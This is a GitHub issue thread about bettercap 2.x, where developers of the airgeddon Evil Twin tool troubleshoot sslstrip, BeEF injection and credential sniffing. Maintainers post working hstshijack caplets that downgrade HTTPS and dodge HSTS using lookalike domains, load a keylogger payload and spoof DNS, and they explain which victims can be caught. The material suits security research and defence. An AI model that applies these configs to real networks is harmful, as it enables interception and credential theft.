Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

sslstrip not working as in 1.x / http.proxy refactoring #428

Closed
OscarAkaElvis opened this issue Jan 30, 2019 · 65 comments
Closed

sslstrip not working as in 1.x / http.proxy refactoring #428

OscarAkaElvis opened this issue Jan 30, 2019 · 65 comments
Assignees
Labels
bug Something isn't working enhancement New feature or request refactor

Comments

@OscarAkaElvis
Copy link

Hi, this is not a bug report, just looking for some support.

Our team has old versions of bettercap fully integrated into another script called airgeddon performing flawlessly Evil Twin attacks using Bettercap+BeEF, etc... For now, max bettercap version supported is 1.6.2 (just before the major change) and we would like to integrate new Bettercap versions (2.x). We already have the function to detect if the bettercap present in OS is the old or the new one, that part is ok. I must say we missed some "-version" or similar tag in order to get this easier... but anyway it was done using bettercap -eval "q" and parsing output... We just like to add this awesome tool to keep the compatibility with its new versions. We are trying to keep same functionallity and features using the new versions 2.x

Ok, after the introduction, lets explain what we really need:

Environment

We are using on tests bettercap 2.13 in Kali which is the latest in their repos and 2.13.1 in Parrot Security.

An example of the command line on the old fully working 1.6.2 version is:

bettercap -I wlan0 -X -S NONE --no-discovery --proxy --proxy-port 8080 --disable-parsers URL,HTTPS,DHCP --no-http-logs --proxy-module injectjs --js-url "http://192.168.1.1:3000/hook.js" --dns-port 5300

This is our bettercap 2.x configuration file approach:

net.recon off

set http.proxy.port 8080
set http.proxy.script ag.bettercap.js
set http.proxy.sslstrip true
http.proxy on

set net.sniff.verbose true
net.sniff on

events.ignore net.sniff.http.response
events.ignore http.proxy.spoofed-response
events.ignore net.sniff.dns
events.ignore net.sniff.tcp
events.ignore net.sniff.udp

And we also have the ag.bettercap.js file with the BeEF stuff pointing to the server's hook.js file. I'm not going to put its content because the BeEF part is working. The js is injected and the clients are hooked, that part is ok. The problem is that nor sslstrip neither ssltrip2 are not working for us. For sure we are doing something wrong.

Bear in mind that on the Evil Twin integration there is no need for ARP spoofing or any recon... the MiTM is already done. The features we need are:

  • sniff passwords from GET/POST http requests <- this is working
  • sniff ftp passwords <- I think you recently did a commit to add this feature, thanks!
  • inject BeEF js <- this is also working
  • sslstrip <- we are not seeing any password from any ssl site (even unknown custom sites without HSTS)
  • sslstrip2 <- this is not working for us 😢
  • Try to clean as much as possible the output <- that's the reason of using events.ignore stuff
  • Log to a file while showing output in the console at the same time <- not sure if this is possible using set events.stream.output statement... anyway I think maybe can be done using tee

Are we on the right path? Could you help us to provide a config file approach for this kind of configuration? That would be awesome!

P.S. Feel free to close this instantly because as I said, it is not a bug report, just some kind of question. Maybe we can talk here about this even with the closed thread.

Thank you so much for your time and regards.

@evilsocket
Copy link
Member

Would you be able to provide a test domain with https and no hsts where sslstrip used to work in the old version? I have the feeling there's a bug in this new sslstrip implementation :D

@evilsocket evilsocket self-assigned this Jan 31, 2019
@evilsocket evilsocket changed the title Bettercap integration into other scripts sslstrip not working as in 1.x Jan 31, 2019
@evilsocket evilsocket added the bug Something isn't working label Jan 31, 2019
@OscarAkaElvis
Copy link
Author

Hi, I tested it using this page: www.muji.us/store/customer/account/login. Entering to this url it is redirected to ssl but it has not the HSTS headers. Here is the proof that it is working on bettercap 1.6.2 and the integrated attack using airgeddon:

bettercap2

Another site I tested is trello.com. This page has HSTS. Anyway, this is the proof it it is working on bettercap 1.6.2. Is a screenshot of the bettercap+BeEF integrated attack on airgeddon.

bettercap1

On these pages, sslstrip is not working on new bettercap. 🙄

Here is a screenshot of what we see in the bettercap's window using the same attack on airgeddon but with the new bettercap version (using the config caplet I posted before)... as you can see nothing special.

image

And what is shown on the victims browser is a failed redirect to a wwww.muji.us and a 404 error... then it redirects to https://www.muji.us and from here all is encrypted... Not sure if sslstrip should be configured in a different way.

What about the caplet config file? Are we doing well what we want? or are we missing options? It could be really nice if you could give us some advices about config in order to be able to integrate airgeddon with the new versions of your tool. Thanks.

@evilsocket
Copy link
Member

i'd need the full log (do not ignore any events, also, the events you're interested in are from http.proxy and not net.sniff) ... anyways, i can start testing against those domains, will keep this issue updated.

Thanks for reporting 👍

@evilsocket
Copy link
Member

@evilsocket evilsocket changed the title sslstrip not working as in 1.x sslstrip not working as in 1.x / http.proxy refactoring Feb 1, 2019
@evilsocket evilsocket added enhancement New feature or request refactor labels Feb 1, 2019
@OscarAkaElvis
Copy link
Author

Great. Let me know if you need more help from our side.

@buffermet
Copy link
Member

buffermet commented Feb 4, 2019

Hi guys, I have been noticing many issues being written about the builtin sslstrip module, and I just wanted to share some of my experience with downgrading TLS and HSTS.

HSTS purely relies on correct spelling of domains, and that is why the builtin sslstrip turns subdomains like www into wwww, webmail into wwebmail, etc. to trick browsers into thinking that a different domain (without HSTS) is requested.

The issue with this is that HSTS can enforce SSL for all subdomains (as is the case with https://github.com), as well as the fact that client-side SSL upgrades can take place (e.g. meta redirections, javascript, etc...).

8 months ago I released a caplet called hstshijack which allows you to downgrade HSTS and TLS, even if includeSubdomains is set or when additional security measures are implemented.

I have documented the caplet with a readme file, but I am thinking about making a video to explain in more detail how bettercap can downgrade every HSTS/TLS instance for web browsers.

This is the HSTS header from github.com:

Strict-Transport-Security: max-age=31536000; includeSubdomains; preload

github.com is also enrolled in Chrome's HSTS preloading program, as seen here: https://hstspreload.org/?domain=github.com

This means that you will not be able to just SSLstrip connections with GitHub, unless the browser that requested github is absolutely terrible and doesn't even support HSTS *coughsamsung*.

In order to successfully sniff GitHub passwords, you will need to alter the spelling of their domain, as wwww.github.com will still be upgraded since includeSubdomains is included in GitHub's HSTS header.

For this example I have chosen to alter GitHub's top level domain, changing it from github.com to github.corn.

This is the caplet I used:

set hstshijack.log             /usr/local/share/bettercap/caplets/hstshijack/ssl.log
set hstshijack.payload         /usr/local/share/bettercap/caplets/hstshijack/payloads/hstshijack-payload.js
set hstshijack.ignore          *
set hstshijack.targets         github.com,*.github.com
set hstshijack.replacements    github.corn,*.github.corn
set hstshijack.obfuscate       true
set hstshijack.encode          false

# SSLstrip + keylogger + Google downgrade
set hstshijack.custompayloads    *:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js,google.com:/usr/local/share/bettercap/caplets/hstshijack/payloads/google.js,*.google.com:/usr/local/share/bettercap/caplets/hstshijack/payloads/google.js,google.com.au:/usr/local/share/bettercap/caplets/hstshijack/payloads/google.js,*.google.com.au:/usr/local/share/bettercap/caplets/hstshijack/payloads/google.js

set http.proxy.script     /usr/local/share/bettercap/caplets/hstshijack/hstshijack.js
set http.proxy.port       8222
set dns.spoof.domains     github.corn,*.github.corn

dns.spoof     on
http.proxy    on
net.sniff     on

And this is the result:

screenshot from 2019-02-04 11-35-18

Now you may argue that nobody will ever type corn instead of com, and that is probably true, but Google has sacrificed their search engine's HSTS to allow dumb devices to trigger the captive portal, while search engines like Yahoo and Bing don't seem to understand HSTS and how to properly implement it. Therefore hstshijack injects a core JavaScript payload to ensure that every instance of github.com is replaced with github.corn on every page.

Cheers 🥂

@JBalanza
Copy link

JBalanza commented Feb 4, 2019

I was trying the caplet you mentioned @yungtravla but seems that it doesn't work for us. I'm using the original (the one hijacks facebook) but no logs are generated when I visit the page from a spoofed client. Despite this, the client connects to facebook and no to facedook.com and it has full conectivity (but seems not to pass throught bettercap). In our test we are deleting all cookies, caché and navigation history and then accesing to facebook.com (without specifying the protocol).

Also we need to spoof any domain as the old bettercap does. Since we use it in a evil twin attack and we don't know the pages the client will access. Is it possible to specify the hstshijack hosts as "." or something similar like in bettercap 1.6.2?

Regards.

@OscarAkaElvis
Copy link
Author

OscarAkaElvis commented Feb 4, 2019

Yeah it could be awesome to enable the sslstrip sniffing without specifying any domain like in old bettercap versions because as @JBalanza said... we don't know which pages are going to be visited by the victims. Anyway, it seems is not working even using that caplet and testing it on facebook.com 😨

@buffermet
Copy link
Member

buffermet commented Feb 5, 2019

@JBalanza , @OscarAkaElvis

Despite this, the client connects to facebook and no to facedook.com and it has full conectivity

Anyway, it seems is not working even using that caplet and testing it on facebook.com

facebook.com is preloaded with HSTS and is therefore automatically upgraded to SSL in browsers... You simply cannot downgrade SSL when the victim requests facebook.com or *.facebook.com, unless, as I pointed out before, they are using a very bad browser (bloatware or something) that does not support HSTS headers and/or Google's HSTS preload program.

Read more here: https://hstspreload.org/?domain=facebook.com

The whole idea is that you inject a search engine, or any other page that contains a <a href="https://www.facebook.com">, <form target="https://www.facebook.com">, and <iframe src="https://www.facebook.com">, which then gets replaced with http://www.facedook.com by the core hstshijack payload.

You can also target common typos that people make, such as facebok.com.

Now it is your job to successfully downgrade additional JavaScript security, so you will have to do some initial testing on specific search engines like Google and Yahoo. I have a payload that downgrades their JavaScript security, and I am happy to demonstrate how it works.

Also we need to spoof any domain as the old bettercap does. Since we use it in a evil twin attack and we don't know the pages the client will access

we don't know which pages are going to be visited by the victims

You simply have no other option with HSTS, because sites can now protect all their subdomains, including www, wwww, wwwww, etc...

I have just made a small change to the hstshijack module so you can also target top level domains only, for example:

set hstshijack.targets       *.com,*.net,*.co.uk
set hstshijack.replacements  *.corn,*.nel,*.cc.uk

I will push that now :)

@JBalanza
Copy link

JBalanza commented Feb 5, 2019

We are trying with other domains but our results are still the same. When we have access to that commit we will full try again our implementation with Airgeddon.
Besides that, I have a naive question. Is it possible to use wildcards in dns.spoof.domains for top level domains as for hstshijack.targets and hstshijack.replacements ?

@buffermet
Copy link
Member

buffermet commented Feb 5, 2019

We are trying with other domains but our results are still the same.

Then those hosts are HSTS preloaded, use Strict-Transport-Security headers, are cached by the browser, or you are using a plugin like HTTPS Everywhere. There is no other reason why it should not work.

Is it possible to use wildcards in dns.spoof.domains for top level domains as for hstshijack.targets and hstshijack.replacements ?

Yes, I just tried it out and it works like a charm, so if you spoof all top level domains then every site (given that the referrer was injected/browser cache is cleared/...) can be sniffed.

@buffermet
Copy link
Member

buffermet commented Feb 5, 2019

A quick summary as to when you can or cannot downgrade SSL of hostnames like facebook.com:

✔️   When you are able to downgrade facebook.com:

  • You injected a page that contains a link to facebook.com which the victim clicked/triggered
  • You got a request from a primitive browser (like the Samsung Browser which does not support HSTS) and facebook.com was not cached

❌   When you are not able to downgrade facebook.com:

  • The victim typed facebook.com into a modern browser
  • The victim got redirected to facebook.com from a page that was not injected

@OscarAkaElvis
Copy link
Author

Hi, thanks for clarifying how sslstrip and sslstrip2 works and how impact on some domains and browsers. I'll perform tests deeply to see if finally we can make this work.

Anyway, we need some help with more stuff... on old bettercap we had the -O argument to save in a file all the same text shown on screen (but without colors which is nice). Now we tested the new events.stream.output setting it pointing to a file but this is not working as expected for us. On wiki this option is documented as If not empty, events will be written to this file instead of the standard output. but I must remark the "instead" word... but what we need is to show all on the window and in addition to write all in a file in order to parse it later looking for passwords, cookies or whatever.

I tried to do it using the "trick" of | tee <file> and at first sight it works... everything is shown in the window and in the file... but the file has all the color stuff and is really hard to parse... Do you know how can we achieve the same behavior like in old bettercap versions? I mean to print all on window with colors and write it in a file without colors. Thanks.

@buffermet
Copy link
Member

buffermet commented Feb 6, 2019

@OscarAkaElvis no worries, just keep in mind that ssl stripping and hsts bypassing are different things. You can't sslstrip and spoof only subdomains. In many cases you have to spoof the actual domain.

Please open a new issue in regards to saving output, that way we can keep a record of each issue :)

@OscarAkaElvis
Copy link
Author

Ok I'll open a new issue if needed but the orginal issue was "Bettercap integration into other scripts". Originally I was asking about how to migrate the arguments from the 1.x version to 2.x and somebody changed the issue and deviated it to a bug problem but my target opening this issue was to be able to integrate bettercap 2.x with my tool airgeddon which has already fully working an attack integrating bettercap until version 1.x.

I think the open source tools creators should collaborate and I'd really like to integrate bettercap 2.x . The problem is that I don't really know if something is not working in bettercap 2.x or it just has not the feature I need. If you think that what I'm asking for (just a simple option to create a log file with the same output as shown in the screen but without colors) is not possible to do right now with the available options in bettercap 2.x ok, confirm it to me and I'll open another issue for the feature request, but at first sight, I'm basing in what it was working in bettercap 1.x because I suppossed that same features should be available (now I see that is not true).

I did a "dirty" workaround for the log stuff.... I saw bettercap 2.x has a -no-color option. If I do that, I can use a pipe and tee command to have same output in a file without colors... but doing that I'm losing the colors on the screen.

Another "dirty" workaround could be to use ccze package. Using <bettercap_whatever_cmd> | tee <mylogfile> | ccze -A. Using this, I can get the log without colors (really needed to be parsed) and the output colorized on the screen... but the bad part here is that not all users will have installed ccze.

Ideally, bettercap 2.x should have an option (like 1.x have) to create a log file without colors while showing colors on screen.

I really urged you to give it a try to our tool in order to understand the context of what is needed. You'll need just a git clone to it and a compatible to monitor mode wireless card. That's all. As I said, bettercap 1.x is working flawlessly with all the needed features (log, sniffing plain ftp and http stuff, sslstripping, sslstriping2 and BeEF js injection). I insist in open-source tools creators should collaborate. Thanks for this awesome tool. We really like it but in my opinion, the port to 2.x was premature because it seems it doesn't have the same level of features as 1.x . Ok, I can understand anyway the portability but this needs to mature and if we can help on that process testing, reporting or however we are glad to help.

Summarizing, please confirm if bettercap 2.x right now have the log feature. If not, I'll open a new issue as you requested but I thought all related stuff could be discussed here. Thanks and regards.

@buffermet
Copy link
Member

@OscarAkaElvis bettercap v2.x is far superior to the legacy version, with many new features, and much more accessibility and control.

Originally I was asking about how to migrate the arguments from the 1.x version to 2.x and somebody changed the issue and deviated it to a bug problem

I read the issue you posted, you were specifically asking for help with sslstrip:

I'm not going to put its content because the BeEF part is working. The js is injected and the clients are hooked, that part is ok. The problem is that nor sslstrip neither ssltrip2 are not working for us.


Regarding your second issue: There are multiple ways you can go about saving the stream while watching it, with and/or without colors. For instance, you can follow the tail of the events.stream.output file (tail -f /path/to/output.txt)...

To save a copy of the events log without colors you can find and replace them, like so:

sed "s/\x1b\[[0-9]\+\(;[0-9]\+\)*\+m//g" /path/to/output.txt > /path/to/output.nocolors.txt

@OscarAkaElvis
Copy link
Author

Ok, thanks for the suggestion, I'll try that workaround once something is logged... but I'm still not able to make work the log stuff using bettercap option for that... I just added to my config capplet set events.stream.output <path-to-log-file> but the file is not created (I have permissions, the path dir is existing, etc)... I captured some passwords and the file still is not created... if I execute help on bettercap console I can see the events.stream running but nothing is logged... is needed something more to log? am I missing something or did we found a bug accidentally? I tested it on 2.13

@buffermet
Copy link
Member

The events.stream module is enabled on launch. You will have to restart that module so it adopts the changes you made to events.stream.output.

@OscarAkaElvis
Copy link
Author

OscarAkaElvis commented Feb 6, 2019

So... If I understood well... on my configuration caplet I should make this:

set events.stream.output <path-to-logfile>
events.stream off
events.stream on

Think about even with an interactive console, we are trying to perform an automatized process, so forget about launching stuff on bettercap's console. Ok, I'll try that. Thanks.

@OscarAkaElvis
Copy link
Author

Yeah man, this method is working... and your sed line is working like a charm... one suggestion about this. Using this bettercap feature to log the file, as wiki documentation said, the captured stuff is not shown on the screen, then it is appearing in the log. ¿? Why can't we see what is happening on the screen and in addition get it into the log? To me sounds like the best option, I mean to have both (screen and file, like in 1.x versions).

Anyway we are going to solve this for the integration using the tee and then using your sed cmd. In this way we'll have all the stuff on screen and also in the log file generated by tee and after sed, everything ready to be parsed without colors on the file.

Thanks! this is the kind of support we need to be able to integrate this. Not only to fix bugs (which is important) but we don't have that deep knowledge about how bettercap works.

Soon I'll perform deep tests about sslstrip and I'll get back to here with my report.

@buffermet
Copy link
Member

buffermet commented Feb 6, 2019

There's no real need for that, because you can detach multiple processes and pipe their standard output to one terminal. For example:

touch output.txt && tail -f output.txt & bettercap -eval "set events.stream.output output.txt; restart events.stream"

In a terminal, && will wait for the prior command to finish with success, whereas & will not wait for the prior command to finish and runs whatever command that follows immediately.

Using & will print the PID of the detached process that was launched, in the example above it is tail. To stop tail you will then have to send a SIGTERM to that PID.

@buffermet
Copy link
Member

It could be a nice builtin feature however, in case we forget to follow the output tail, and don't want to restart the session and possibly lose the session config.

@OscarAkaElvis
Copy link
Author

Yeah, the log stuff finally was solved using "bash tricking" out of bettercap features... the tee, the sed to clean colors on log, etc... but now that part is fully working. Anyway, yes, it could be nice to have an option to create a log (log without colors) while not losing anything on the screen (colored), in the same way as it works on bettercap 1.x

I didn't have time yet to test deeply the sslstrip stuff... The expected behavior is the same as bettercap 1.x (at least is the expected for me as user). I'll try to make it work on trello.com and on this other site www.muji.us/store/customer/account/login that are sites which work with bettercap 1.x . Any advice before doing the testing? how it should be my config or my js file? from what version are available the changes to perform sslstrip on generic extensions? I mean *.com or similar. Thanks.

@user568989
Copy link

user568989 commented Feb 13, 2019

@yungtravla from what i see sites like facecook , gmail that r hsts preloaded
The attacker can't decrypt the data cause it will always look for HTTPS even if the victim types facebook.com.
( i am talking about modern browsers that the victim already visited the specific site like: facebook.com
Even if the victim is at the same network with the hacker the victim is SAFE..
Correct?
There is nothing we can do?

@OscarAkaElvis
Copy link
Author

OscarAkaElvis commented Mar 13, 2019

Same results using last release v2.19 as you can see in the screenshot with the given in my last post config.

image

I'll wait to this change to reach master version or kali/parrot repos to keep trying on this.

@buffermet
Copy link
Member

buffermet commented Mar 13, 2019

I will test all of this with the new bettercap version soon

When you do, be sure to provide those full debug logs we asked for.

I'll wait to this change to reach master version

These changes were already pushed to master.

@buffermet
Copy link
Member

buffermet commented Mar 13, 2019

testing locally and I am not having any issues sniffing keystrokes on a spoofed trello page:

Screenshot from 2019-03-13 23-39-03
Screenshot from 2019-03-13 23-39-25
Screenshot from 2019-03-13 23-39-52

caplet:

set hstshijack.log             /root/caplets/hstshijack/ssl.log
set hstshijack.payload         /root/caplets/hstshijack/payloads/hstshijack-payload.js
set hstshijack.ignore          *
set hstshijack.targets         *.com
set hstshijack.replacements    *.corn
set hstshijack.obfuscate       true
set hstshijack.encode          false

# SSLstrip
# Keylogger
set hstshijack.custompayloads  *:/root/caplets/hstshijack/payloads/sslstrip.js,*:/root/caplets/hstshijack/payloads/keylogger.js

set http.proxy.script     /root/caplets/hstshijack/hstshijack.js
set http.proxy.port       8200
set net.sniff.filter      not (arp or port 5353)
set net.sniff.verbose     false

http.proxy  on
net.sniff   on

So we need more information, please provide step by step explanation of your methods, and do not leave out any details, for example:

  1. start VM/test browser/...
  2. clear history & cache of browser
  3. enter google.com in the URL bar
  4. ...

@OscarAkaElvis
Copy link
Author

Ok... i can't make this work... quite strange... I did another apt update && apt dist-upgrade on my Kali Linux. Another bettercap version was downloaded but checking the version is still 2.19 ... only changed the built for linux amd64 with ... message. Before was go1.10.4 and now is go1.11.5. I think this is not a very good practice IMO... if it is another version it should have another version number... but that is only a suggestion.

Anyway, I'll try to describe how I'm launching bettercap and what is it for and how you can reproduce the problem.

In first place I must say that with this new version there is no more [hstshijack] Invalid hstshijack.targets value (got *.com) message... so it seems now at last I have a version supporting it. Great news!

Then, as I exposed before on this thread, what our team is trying to do is to integrate bettercap 2.x in one Evil Twin attack using airgeddon tool. If you download master version you'll see that it is working flawlessly with bettercap 1.x . If you have bettercap 2.x the tool stops before launching the attack and recommends to you to perform a bettercap downgrade using this instructions. Ok, until here everything is clear and working.

Now let's try the airgeddon tool on its branch called "bettercap2.x" on which we are trying to make this to work. We already have implemented the version detection and the log stuff... only the sslstrip is remaining and we need to set up a nice and working caplet for that. The tool on this branch is able to detect bettercap's version and launch it in the old working way for bettercap 1.x and with the new caplet way for the 2.x . So... if you want to reproduce it, first perform a git clone of the tool on that branch: git clone -b bettercap2.x https://github.com/v1s1t0r1sh3r3/airgeddon

Then you should launch the tool and navigate to Evil Twin attacks menu to launch the Evil Twin AP attack with sniffing and bettercap-sslstrip2/BeEF. attack. You'll need a wireless card of course to do that.

Remember that the caplet already implemented on this branch is not working yet. It will be created once attack is launched at /tmp/ag.bettercap.cap, so as soon as the attack is launched we'll close manually the opened bettercap window in order to launch our custom bettercap with desired config.

Launch the attack selecting any existing target. If you don't want to disturb to network's owner once the attack is launched close also the DoS window (the red one)... or maybe you can launch the attack over an invented non-existing target answering "Y" to the question You haven't selected any target, you'll be prompted to input data manually. Do you want to continue? [y/N] and then entering any BSSID (00:00:00:00:00:11 for example), any channel and any ESSID (test for example). In this way you can test without disturbing anybody.

Once the attack is launched, as we said before, close the bettercap's window and the DoS window if proceed and then open another terminal and launch bettercap. I did using the caplet you put on your last post, only just changing the route for the files keylogger.js , hstshijack.js, sslstrip.js and hstshijack-payload.js to point to the right ones which are in /usr/share/bettercap/caplets/hstshijack/ because of the bettercap-caplets package. In this way: bettercap -iface wlan0 -no-history -caplet itshouldbeworking.cap

Now we are ready to test...

Now I connect using my Oneplus3 Android 8 phone acting as a victim to the "test" network. I open Chrome browser and I close all tabs first, clean absolutely all privacy options (cookies, history, temp files, etc). I must say I did tons of tests using the same phone and procedure which worked with bettercap 1.x. Then I open a tab and type "http://trello.com" . At this point I think is the same as just typing "trello.com" but I want to be sure... anyway... the page is not opening while I can surf on other non-spoofed pages like google, instagram or whatever...

As a curious data... I can say that once launched... it says "sslstrip disabled" which sounds to me very weird... I think it should be "sslstrip enabled"... and it is exactly your caplet file... ¿? the proof (I marked it in red):

image

And this is the full log... on it, you can see some requests... the failed trello.com request and some which worked like instagram or google as I said.

bettercap v2.19 (built for linux amd64 with go1.11.5) [type 'help' for a list of commands]

[06:20:14] [sys.log] [war] Could not detect gateway.
[06:20:14] [endpoint.new] endpoint 192.168.1.33 detected as c0:ee:fb:df:fc:2a (OnePlus Tech (Shenzhen) Ltd).
[06:20:14] [sys.log] [inf] [hstshijack] Generating random variable names for this session ...
[06:20:14] [sys.log] [inf] [hstshijack] Reading SSL log ...
[06:20:14] [sys.log] [inf] [hstshijack] No SSL log file found, creating one now ...
[06:20:14] [sys.log] [inf] [hstshijack] Reading caplet ...
[06:20:15] [sys.log] [inf] [hstshijack] Module loaded.

  Commands

    hstshijack.show : Show module info.

  Caplet

               hstshijack.log > /root/Desktop/airgeddon/bettercapssl.log
           hstshijack.payload > /usr/share/bettercap/caplets/hstshijack/payloads/hstshijack-payload.js
            hstshijack.ignore > *
           hstshijack.targets > *.com
      hstshijack.replacements > *.corn
      hstshijack.blockscripts > undefined
         hstshijack.obfuscate > true
            hstshijack.encode > false
    hstshijack.custompayloads > *:/usr/share/bettercap/caplets/hstshijack/payloads/sslstrip.js
                              > *:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js

  Session info

         Session ID : QkctfflaIghzZ
      Callback Path : /cdHfcLeiKwWOHA
     Whitelist Path : /CtLnvK
       SSL Log Path : /GPjZhMOgw
            SSL Log : 1 host

[06:20:15] [sys.log] [inf] http.proxy started on 192.168.1.1:8200 (sslstrip disabled)
192.168.1.0/24 > 192.168.1.1  » [06:20:27] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : accounts.google.com is 216.58.214.173
192.168.1.0/24 > 192.168.1.1  » [06:20:27] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : accounts.google.com is 216.58.214.173
192.168.1.0/24 > 192.168.1.1  » [06:20:27] [net.sniff.https] sni 192.168.1.33 > https://accounts.google.com
192.168.1.0/24 > 192.168.1.1  » [06:20:28] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : googleapis.l.google.com is 216.58.210.138, 216.58.210.170, 172.217.17.10, 172.217.168.170, 172.217.16.234, 216.58.211.42, 216.58.201.170
192.168.1.0/24 > 192.168.1.1  » [06:20:28] [net.sniff.https] sni 192.168.1.33 > https://android.googleapis.com
192.168.1.0/24 > 192.168.1.1  » [06:20:28] [net.sniff.https] sni 192.168.1.33 > https://android.googleapis.com
192.168.1.0/24 > 192.168.1.1  » [06:20:28] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : www.google.com is 172.217.168.164
192.168.1.0/24 > 192.168.1.1  » [06:20:28] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : clientservices.googleapis.com is 172.217.16.227
192.168.1.0/24 > 192.168.1.1  » [06:20:28] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : googleapis.l.google.com is 172.217.168.170, 172.217.16.234, 216.58.211.42, 216.58.201.170, 216.58.214.170, 172.217.17.10
192.168.1.0/24 > 192.168.1.1  » [06:20:28] [net.sniff.https] sni 192.168.1.33 > https://clientservices.googleapis.com
192.168.1.0/24 > 192.168.1.1  » [06:20:28] [net.sniff.https] sni 192.168.1.33 > https://www.google.com
192.168.1.0/24 > 192.168.1.1  » [06:20:28] [net.sniff.https] sni 192.168.1.33 > https://www.googleapis.com
192.168.1.0/24 > 192.168.1.1  » [06:20:28] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : clients.l.google.com is 216.58.201.174
192.168.1.0/24 > 192.168.1.1  » [06:20:28] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : googlehosted.l.googleusercontent.com is 172.217.16.225
192.168.1.0/24 > 192.168.1.1  » [06:20:28] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : clients.l.google.com is 172.217.168.174
192.168.1.0/24 > 192.168.1.1  » [06:20:28] [net.sniff.https] sni 192.168.1.33 > https://lh3.googleusercontent.com
192.168.1.0/24 > 192.168.1.1  » [06:20:28] [net.sniff.https] sni 192.168.1.33 > https://clients4.google.com
192.168.1.0/24 > 192.168.1.1  » [06:20:34] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : rdsauyrbteqtz is Non-Existent Domain
192.168.1.0/24 > 192.168.1.1  » [06:20:34] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : flcymtrpgdesazw is Non-Existent Domain
192.168.1.0/24 > 192.168.1.1  » [06:20:34] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : snzgillm is Non-Existent Domain
192.168.1.0/24 > 192.168.1.1  » [06:20:36] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : history.l.google.com is 64.233.166.113, 64.233.166.102, 64.233.166.100, 64.233.166.101, 64.233.166.138, 64.233.166.139
192.168.1.0/24 > 192.168.1.1  » [06:20:38] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : accounts.google.com is 172.217.168.173
192.168.1.0/24 > 192.168.1.1  » [06:20:38] [net.sniff.https] sni 192.168.1.33 > https://accounts.google.com
192.168.1.0/24 > 192.168.1.1  » [06:20:38] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : clients.l.google.com is 172.217.168.174
192.168.1.0/24 > 192.168.1.1  » [06:20:38] [net.sniff.https] sni 192.168.1.33 > https://clients4.google.com
192.168.1.0/24 > 192.168.1.1  » [06:20:38] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : www3.l.google.com is 172.217.17.14
192.168.1.0/24 > 192.168.1.1  » [06:20:39] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.33 : www3.l.google.com is 216.58.211.46
192.168.1.0/24 > 192.168.1.1  » [06:20:39] [net.sniff.https] sni 192.168.1.33 > https://accounts.youtube.com
192.168.1.0/24 > 192.168.1.1  » [06:20:39] [net.sniff.https] sni 192.168.1.33 > https://accounts.doubleclick.net
192.168.1.0/24 > 192.168.1.1  » [06:20:39] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : history.l.google.com is 64.233.166.139, 64.233.166.102, 64.233.166.113, 64.233.166.138, 64.233.166.100, 64.233.166.101
192.168.1.0/24 > 192.168.1.1  » [06:20:39] [net.sniff.https] sni 192.168.1.33 > https://history.google.com
192.168.1.0/24 > 192.168.1.1  » [06:20:40] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : accounts-cctld.l.google.com is 216.58.204.99
192.168.1.0/24 > 192.168.1.1  » [06:20:40] [net.sniff.https] sni 192.168.1.33 > https://accounts.google.es
192.168.1.0/24 > 192.168.1.1  » [06:20:40] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : www.google.com is 172.217.16.228
192.168.1.0/24 > 192.168.1.1  » [06:20:44] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : scontent.xx.fbcdn.net is 31.13.83.4
192.168.1.0/24 > 192.168.1.1  » [06:20:44] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : m.youtube.com is 172.217.16.238
192.168.1.0/24 > 192.168.1.1  » [06:20:44] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : static.milanuncios.com is 54.230.63.25
192.168.1.0/24 > 192.168.1.1  » [06:20:44] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : uecdn-es.map.fastly.net is 151.101.121.50
192.168.1.0/24 > 192.168.1.1  » [06:20:44] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : uecdn-es.map.fastly.net is 151.101.121.50
192.168.1.0/24 > 192.168.1.1  » [06:20:44] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : c.media-amazon.com is 54.192.60.18
192.168.1.0/24 > 192.168.1.1  » [06:20:44] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : es.m.wikipedia.org is 91.198.174.192
192.168.1.0/24 > 192.168.1.1  » [06:20:44] [net.sniff.https] sni 192.168.1.33 > https://www.google.com
192.168.1.0/24 > 192.168.1.1  » [06:20:44] [net.sniff.https] sni 192.168.1.33 > https://static.xx.fbcdn.net
192.168.1.0/24 > 192.168.1.1  » [06:20:44] [net.sniff.https] sni 192.168.1.33 > https://m.youtube.com
192.168.1.0/24 > 192.168.1.1  » [06:20:44] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.33 : z-p42-instagram.c10r.facebook.com is 31.13.83.174
192.168.1.0/24 > 192.168.1.1  » [06:20:44] [net.sniff.https] sni 192.168.1.33 > https://static.milanuncios.com
192.168.1.0/24 > 192.168.1.1  » [06:20:44] [net.sniff.https] sni 192.168.1.33 > https://images-na.ssl-images-amazon.com
192.168.1.0/24 > 192.168.1.1  » [06:20:44] [net.sniff.https] sni 192.168.1.33 > https://www.google.com
